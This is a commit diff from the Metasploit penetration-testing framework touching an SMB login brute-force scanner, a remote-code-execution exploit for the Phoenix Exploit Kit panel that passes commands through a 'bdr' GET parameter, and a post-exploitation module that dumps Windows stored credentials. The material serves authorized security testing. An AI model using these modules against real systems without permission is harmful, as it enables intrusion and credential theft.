Merge branch 'master' into feature/MS-1715/rex-socket-gem
David Maloney
commit
4b2d6b623d
|
|
@ -70,6 +70,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
@scanner = Metasploit::Framework::LoginScanner::SMB.new(
|
@scanner = Metasploit::Framework::LoginScanner::SMB.new(
|
||||||
host: ip,
|
host: ip,
|
||||||
port: rport,
|
port: rport,
|
||||||
|
local_port: datastore['CPORT'],
|
||||||
stop_on_success: datastore['STOP_ON_SUCCESS'],
|
stop_on_success: datastore['STOP_ON_SUCCESS'],
|
||||||
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
|
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
|
||||||
connection_timeout: 5,
|
connection_timeout: 5,
|
||||||
|
|
|
||||||
|
|
@ -14,22 +14,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Phoenix Exploit Kit Remote Code Execution',
|
'Name' => 'Phoenix Exploit Kit Remote Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
|
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
|
||||||
Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
|
Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
|
||||||
presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
|
presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
|
||||||
then silently installs malware.
|
silently installing malware if found.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'CrashBandicot @DosPerl', #initial discovery
|
'CrashBandicot', #initial discovery by @DosPerl
|
||||||
'Jay Turla <@shipcod3>', #msf module
|
'Jay Turla' #msf module by @shipcod3
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'EDB', '40047' ],
|
[ 'EDB', '40047' ],
|
||||||
[ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
|
[ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
|
||||||
[ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
|
[ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
|
@ -45,16 +45,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
|
[ 'Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
|
||||||
['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
|
[ 'Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Jul 01 2016',
|
'DisclosureDate' => 'Jul 01 2016',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
|
OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])
|
||||||
],self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
if res && res.body.include?(test)
|
if res && res.body.include?(test)
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
end
|
||||||
return Exploit::CheckCode::Safe
|
Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
@ -72,12 +72,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def http_send_command(cmd)
|
def http_send_command(cmd)
|
||||||
send_request_cgi({
|
send_request_cgi(
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => normalize_uri(target_uri.path),
|
'uri' => normalize_uri(target_uri.path),
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
'bdr' => cmd
|
'bdr' => cmd
|
||||||
}
|
}
|
||||||
})
|
)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
|
|
@ -178,14 +178,25 @@ class MetasploitModule < Msf::Post
|
||||||
credentials = []
|
credentials = []
|
||||||
#call credenumerate to get the ptr needed
|
#call credenumerate to get the ptr needed
|
||||||
adv32 = session.railgun.advapi32
|
adv32 = session.railgun.advapi32
|
||||||
ret = adv32.CredEnumerateA(nil,0,4,4)
|
begin
|
||||||
p_to_arr = ret["Credentials"].unpack("V")
|
ret = adv32.CredEnumerateA(nil,0,4,4)
|
||||||
if is_86
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
count = ret["Count"]
|
print_error("This module requires WinXP or higher")
|
||||||
arr_len = count * 4
|
print_error("CredEnumerateA() failed: #{e.class} #{e}")
|
||||||
|
ret = nil
|
||||||
|
end
|
||||||
|
if ret.nil?
|
||||||
|
count = 0
|
||||||
|
arr_len = 0
|
||||||
else
|
else
|
||||||
count = ret["Count"] & 0x00000000ffffffff
|
p_to_arr = ret["Credentials"].unpack("V")
|
||||||
arr_len = count * 8
|
if is_86
|
||||||
|
count = ret["Count"]
|
||||||
|
arr_len = count * 4
|
||||||
|
else
|
||||||
|
count = ret["Count"] & 0x00000000ffffffff
|
||||||
|
arr_len = count * 8
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#tell user what's going on
|
#tell user what's going on
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue